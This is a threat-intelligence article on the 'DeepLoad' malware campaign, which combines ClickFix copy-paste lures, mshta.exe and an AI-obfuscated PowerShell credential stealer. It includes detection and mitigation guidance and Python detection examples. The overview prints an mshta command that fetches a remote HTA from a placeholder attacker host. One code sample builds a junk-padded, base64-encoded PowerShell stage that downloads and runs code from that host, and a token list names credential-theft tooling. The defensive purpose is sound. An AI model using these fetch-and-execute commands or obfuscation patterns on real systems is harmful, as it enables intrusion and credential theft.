'DeepLoad' Malware Leverages AI-Generated Code and ClickFix Social Engineering to Steal Credentials

New 'DeepLoad' Malware Campaign Combines AI Obfuscation and 'ClickFix' Delivery to Bypass Defenses

HIGH
March 31, 2026
6m read
Malware, Phishing

Related Entities

Organizations

ReliaQuest

Products & Tech

PowerShell

mshta.exe

Other

DeepLoad

Full Report

Executive Summary

Security researchers at ReliaQuest have uncovered a new malware campaign, named DeepLoad, that represents a significant evolution in threat actor techniques. The campaign combines the increasingly popular "ClickFix" social engineering method for initial execution with a PowerShell loader that is heavily obfuscated with what is believed to be AI-generated code. This combination makes the malware exceptionally difficult to detect using traditional, signature-based security tools. The fileless nature of the attack, which primarily operates in memory, allows it to bypass many static defenses, highlighting the critical need for behavioral analysis and advanced endpoint detection to counter this emerging threat.

Threat Overview

The DeepLoad attack begins with a social engineering lure. The threat actor uses the "ClickFix" technique, where a user is convinced to copy and paste a command into a command-line interface like Windows Terminal or PowerShell. This is often disguised as a necessary step for a security check, software update, or to access content.

In this campaign, the pasted command launched mshta.exe, a legitimate, Microsoft-signed Windows binary, to fetch and run an HTA hosted on a remote, attacker-controlled server. Abusing mshta.exe is a common living-off-the-land (LotL) technique: because the binary is signed by Microsoft, application allow-listing policies that trust Microsoft-signed code will let it run, and the script it loads executes inside that trusted process.

mshta.exe http://attacker.server/malicious.hta

The HTA hands off to a PowerShell loader that is heavily obfuscated. It contains thousands of lines of code that do nothing useful: random variable assignments, functions that are never called, and convoluted logic with no effect. ReliaQuest researchers assess that the volume and consistency of this junk code strongly suggest it was generated by an AI model to act as camouflage, burying the few lines of genuinely malicious code in noise.

Technical Analysis

  • Initial Access & Execution: The lure is social engineering (mapped here to T1566 - Phishing) that delivers the ClickFix instructions. The user pasting and running the command is T1204.004 - User Execution: Malicious Copy and Paste (T1204.002 covers a user opening a malicious file, which is not what happens here). The use of mshta.exe is a specific sub-technique, T1218.005 - System Binary Proxy Execution: Mshta.
  • Defense Evasion: This is where DeepLoad excels. The primary evasion technique is T1027 - Obfuscated Files or Information. Using AI to generate vast amounts of junk code is an advanced form of this, designed to defeat static analysis engines and overwhelm human analysts. The attack is also fileless: the payload is decoded and executed in memory via PowerShell (T1059.001 - PowerShell), so no malicious file is written to disk for a scanner to inspect.
  • Credential Access: The deobfuscated PowerShell payload is built to steal credentials. The reporting summarised here states the goal but not the mechanism, so the exact technique is unconfirmed: Mimikatz-style reading of LSASS memory would map to T1003.001 - OS Credential Dumping: LSASS Memory, while harvesting browser or other stored credentials maps to T1555 - Credentials from Password Stores.

AI-generated obfuscation lowers the cost of producing a unique, polymorphic loader per campaign or even per victim, so hash- and string-based signatures on the loader have little value. Detection has to key on what the script does (process lineage, network fetches, credential-store access) rather than on how it is written.

Impact Assessment

  • High Evasion Rate: DeepLoad's combination of techniques gives it a high probability of bypassing traditional antivirus and even some EDR solutions, leading to undetected infections.
  • Credential Compromise: Successful execution can lead to the theft of user and administrative credentials, giving attackers a foothold in the network to move laterally, exfiltrate data, or deploy ransomware.
  • Increased Analyst Workload: The heavily obfuscated scripts are time-consuming for security analysts to reverse-engineer, delaying incident response and understanding of the threat.

Cyber Observables for Detection

  • Parent-Child Process Relationships: Monitor for mshta.exe spawning powershell.exe (or pwsh.exe). This is a highly suspicious process chain that warrants investigation. With ClickFix the parent of mshta.exe is typically a user-driven process such as explorer.exe (the Win+R Run dialog), cmd.exe or WindowsTerminal.exe rather than an installer or scheduled task, and that grandparent is worth recording in the alert.
  • PowerShell Script Block Logging: Enable Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103). Script blocks are logged as the engine compiles them, so code that never touches disk is still captured, and each layer the loader passes to Invoke-Expression produces its own 4104 event containing the next, less obfuscated layer.
  • Network Connections from Proxy Binaries: Alert on outbound connections from mshta.exe (and similar proxy binaries such as rundll32.exe and regsvr32.exe) to external, uncategorized or newly registered domains; these binaries have few legitimate reasons to reach the internet.
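The process-chain and command-line observables above, expressed as detection logic. This is an added example, not ReliaQuest's tooling or anything from the report: the events are constructed in the block and shaped like the fields of Sysmon Event ID 1 (pid, parent pid, image path, command line), and the mshta command line reuses the article's placeholder URL. The rules generalise slightly beyond mshta.exe to the other signed proxy binaries commonly abused the same way.

```python
"""Process-chain detection for the ClickFix -> mshta.exe -> powershell.exe pattern.

Added example (not ReliaQuest's tooling): the rules run over constructed
process-creation events shaped like the fields of Sysmon Event ID 1 / Windows 4688.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # command line as logged


# Constructed sample telemetry, not real logs. The mshta command line mirrors the
# article's illustrative one (attacker.server is a placeholder); pid 400 is a benign
# local HTA and pid 500 an ordinary shell, included to show what is NOT flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://attacker.server/malicious.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA"),
    ProcEvent(400, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Program Files\Vendor\setup.hta"),
    ProcEvent(500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

# Signed Microsoft binaries commonly abused to proxy script execution (T1218).
PROXY_BINARIES = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# Evasion-style switches: encoded command, no profile, bypassed policy, hidden window.
PS_EVASION_RE = re.compile(
    r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand|nop|noprofile|ep|executionpolicy|w|windowstyle)\b")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_chain(by_pid: dict, pid: int, max_depth: int = 8) -> str:
    """Walk ppid links upward and render 'ancestor > ... > process' for the alert."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen and len(names) < max_depth:
        seen.add(pid)
        names.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(names))


def detect(events) -> list:
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = image_name(ev.image)
        parent = by_pid.get(ev.ppid)
        parent_name = image_name(parent.image) if parent else ""
        # Observable: a proxy binary handed a remote URL on its command line.
        if name in PROXY_BINARIES and URL_RE.search(ev.cmdline):
            findings.append({"rule": "proxy_binary_remote_url", "pid": ev.pid,
                             "severity": "medium", "chain": process_chain(by_pid, ev.pid)})
        # Observable: PowerShell whose parent is a proxy binary; evasion switches raise severity.
        if name in POWERSHELL and parent_name in PROXY_BINARIES:
            severity = "high" if PS_EVASION_RE.search(ev.cmdline) else "medium"
            findings.append({"rule": "proxy_binary_spawns_powershell", "pid": ev.pid,
                             "severity": severity, "chain": process_chain(by_pid, ev.pid)})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The benign local HTA (pid 400) is not flagged because it has no URL argument and spawns nothing, which is the distinction that keeps the rule usable in environments that still run legitimate HTAs; the rendered chain in each finding is what a triage analyst needs first.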

Detection & Response

  • Behavioral Analysis: This is the key to detection. Deploy an EDR solution that monitors for suspicious behaviors, such as a legitimate Windows binary (mshta.exe) downloading and executing code from the internet, or a PowerShell process opening a handle to LSASS with memory-read access. This aligns with D3FEND's Process Analysis.
  • Enhanced Logging: Ensure comprehensive logging is enabled, particularly for PowerShell and command-line activity. These logs are essential for hunting for and investigating fileless attacks.
  • User Training: User education is critical. Users must be trained never to copy and paste commands from untrusted sources, including web pages that present a "verification" or "fix" step, into a terminal, the Run dialog or a PowerShell window.

Mitigation

  • Application Control: Use application control such as Windows Defender Application Control (WDAC) to restrict the execution of scripts and binaries. A WDAC policy in enforced mode also places PowerShell in Constrained Language Mode automatically, and Microsoft's recommended WDAC block rules include mshta.exe, which would stop the first stage before any script runs.
  • Attack Surface Reduction (ASR): Enable ASR rules on Windows endpoints. "Block execution of potentially obfuscated scripts" directly targets loaders like this one. "Block all Office applications from creating child processes" is worth enabling generally, but it does not address ClickFix, where the command is typed by the user rather than launched from a document.
  • PowerShell Constrained Language Mode: Run PowerShell in Constrained Language Mode enforced through WDAC or AppLocker (not via a session variable or environment setting, which a new process can simply reset). CLM blocks Add-Type, arbitrary .NET method calls and the direct Win32 API access that in-memory credential-theft tooling relies on. It does not stop mshta.exe from running the HTA itself, so pair it with the controls above.

Timeline of Events

March 31, 2026: This article was published

MITRE ATT&CK Mitigations

  • Use an EDR that focuses on detecting malicious behaviors, such as a proxy binary spawning PowerShell to perform credential theft.
  • Enable Attack Surface Reduction (ASR) rules and configure PowerShell to run in Constrained Language Mode to limit the capabilities of malicious scripts.
  • Train users to recognize and avoid social engineering tactics like ClickFix.
  • Audit (M1047, enterprise): Enable comprehensive logging, especially PowerShell Script Block Logging, to capture the activity of fileless threats for investigation.
D3FEND Defensive Countermeasures

To combat the evasive nature of DeepLoad, security teams must rely on Process Analysis via an EDR tool. The key detection opportunity is the process chain: a user-driven process (explorer.exe via the Run dialog, or a terminal) launches mshta.exe, which fetches a remote script and spawns powershell.exe. An EDR rule should alert on or block mshta.exe spawning a PowerShell process, as this is not typical behavior. The EDR should then follow that PowerShell process: a handle to lsass.exe requested with memory-read rights, reflective loading of a .NET assembly, or reads of browser credential databases all indicate credential-theft activity. This behavioral focus is essential because the AI-generated obfuscation makes static, signature-based detection of the script itself unreliable.

While the AI-generated code is designed to defeat simple static analysis, analysis of the script content as it executes can still be effective. With PowerShell Script Block Logging (Event ID 4104) enabled, each script block is written to the event log as the engine compiles it, so every layer the loader unwraps and passes to Invoke-Expression appears as its own event, progressively less obfuscated. SIEM solutions can ingest these logs and apply analysis rules. For DeepLoad, rules could look for script blocks with an extremely high ratio of comments, literal assignments and never-called functions to actual cmdlet invocations, or flag tokens such as Invoke-Expression, DownloadString, Add-Type and Invoke-Mimikatz even when they are buried in junk code. Note that the log records what the engine runs, not a cleaned-up version of it; the ability to "see through" the noise comes from capturing each decoded layer, not from the log deobfuscating anything.
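The scripting-content heuristics described above, as an added example that is not ReliaQuest's analysis tooling and contains none of DeepLoad's actual code. The script block it analyses is constructed inside the block to resemble what the article describes (generated comments, literal assignments and never-called functions around a two-line payload that base64-decodes and IEXes a next stage); the URL is the article's placeholder. The layer-unwrapping mimics what successive 4104 events would show, so the same scoring can be pointed at real Script Block Logging output.

```python
"""Heuristic scoring of PowerShell Script Block Logging (Event ID 4104) content.

Added example (not ReliaQuest's analysis tooling). The script below is CONSTRUCTED
to resemble what the article describes, surrounding a two-line payload with junk
comments, literal assignments and never-called functions; it is not DeepLoad's code.
"""
import base64
import re


def _junk(n: int) -> list:
    """Filler of the kind the article describes: comment, literal assignment, dead function."""
    lines = []
    for i in range(n):
        lines.append(f"# helper {i}: normalise input buffer")
        lines.append(f"$v{i} = {i * 7 % 13}")
        lines.append(f"function Get-Helper{i} {{ param($x) return $x + {i} }}")
    return lines


# Inner stage the outer block decodes and IEXes (attacker.server is the article's placeholder).
INNER_STAGE = "Invoke-WebRequest -Uri http://attacker.server/stage2 -UseBasicParsing | Invoke-Expression"
_B64 = base64.b64encode(INNER_STAGE.encode("utf-16-le")).decode()
SAMPLE_SCRIPT = "\n".join(_junk(40) + [
    f"$p = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('{_B64}'))",
    "IEX $p",
])
# Ordinary admin script, to show the heuristics do not fire on short, direct code.
BENIGN_SCRIPT = "Get-Service -Name Spooler | Restart-Service\n$log = 'C:\\temp\\out.txt'\nGet-Date | Out-File $log"

COMMENT_RE = re.compile(r"^\s*#")
LITERAL_ASSIGN_RE = re.compile(r"""^\s*\$\w+\s*=\s*(?:-?\d+|'[^']*'|"[^"]*")\s*$""")
FUNC_DEF_RE = re.compile(r"^\s*function\s+([\w-]+)", re.IGNORECASE)
CMDLET_RE = re.compile(r"\b[A-Z][a-z]+-[A-Za-z0-9]+\b|\bIEX\b")   # Verb-Noun cmdlets plus the IEX alias
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# Tokens worth a closer look regardless of surrounding noise.
HIGH_RISK = {"Invoke-Expression", "IEX", "Invoke-WebRequest", "Invoke-RestMethod",
             "DownloadString", "Add-Type", "Invoke-Mimikatz"}


def unwrap_base64(script: str, max_layers: int = 5) -> list:
    """Peel FromBase64String('...') literals layer by layer (UTF-16LE if NUL bytes are
    present, else UTF-8). Against real logs, the same layers arrive as separate 4104 events."""
    layers = [script]
    for _ in range(max_layers):
        m = B64_RE.search(layers[-1])
        if not m:
            break
        raw = base64.b64decode(m.group(1))
        layers.append(raw.decode("utf-16-le") if b"\x00" in raw[:64] else raw.decode("utf-8", "replace"))
    return layers


def analyze(script: str) -> dict:
    layers = unwrap_base64(script)
    lines = [l for l in layers[0].splitlines() if l.strip()]
    comments = sum(bool(COMMENT_RE.match(l)) for l in lines)
    literal_assigns = sum(bool(LITERAL_ASSIGN_RE.match(l)) for l in lines)
    defined = {m.group(1).lower() for l in lines if (m := FUNC_DEF_RE.match(l))}
    non_defs = [l.lower() for l in lines if not FUNC_DEF_RE.match(l)]
    dead_funcs = sum(1 for name in defined if not any(name in l for l in non_defs))
    cmdlet_calls = [c for c in CMDLET_RE.findall(layers[0]) if c.lower() not in defined]
    all_text = "\n".join(layers)
    risky = sorted(t for t in HIGH_RISK
                   if re.search(rf"(?<![\w-]){re.escape(t)}(?![\w-])", all_text, re.IGNORECASE))
    # Junk ratio: share of lines that are comments, literal assignments or dead function definitions.
    junk_ratio = (comments + literal_assigns + dead_funcs) / max(len(lines), 1)
    suspicious = bool(risky) and (junk_ratio >= 0.8 or len(layers) > 1)
    return {"lines": len(lines), "junk_ratio": round(junk_ratio, 3), "dead_functions": dead_funcs,
            "cmdlet_calls": len(cmdlet_calls), "layers": len(layers), "risky_tokens": risky,
            "verdict": "suspicious" if suspicious else "benign"}


if __name__ == "__main__":
    print(analyze(SAMPLE_SCRIPT))
    print(analyze(BENIGN_SCRIPT))
```

The verdict deliberately requires a risky token and either a high junk ratio or a decoded layer; junk ratio alone would fire on generated or heavily commented legitimate scripts, and a risky token alone would fire on every admin script that uses Invoke-WebRequest.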

Hardening the Windows operating system itself can neutralize threats like DeepLoad. A key control is to enable Windows Defender Attack Surface Reduction (ASR) rules, specifically "Block execution of potentially obfuscated scripts", which targets the technique this malware relies on. Additionally, enforcing PowerShell Constrained Language Mode through a WDAC or AppLocker policy severely restricts what scripts can do: Add-Type, most .NET method calls, COM object creation and direct Win32 API calls are unavailable, which breaks the majority of in-memory credential-theft techniques. This defangs the malicious PowerShell payload even if it executes, though it does not by itself prevent mshta.exe from running the HTA stage, which application control must cover.

Sources & References

Newly observed malware campaign likely combines AI and ClickFix
Cybersecurity Dive (cybersecuritydive.com) March 30, 2026
DeepLoad Malware Combines ClickFix With AI-Generated Code to Avoid Detection
Infosecurity Magazine (infosecurity-magazine.com) March 30, 2026

Article Author

Jason Gomes


• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Malware, AI, ClickFix, PowerShell, Fileless Malware, Social Engineering, Credential Theft
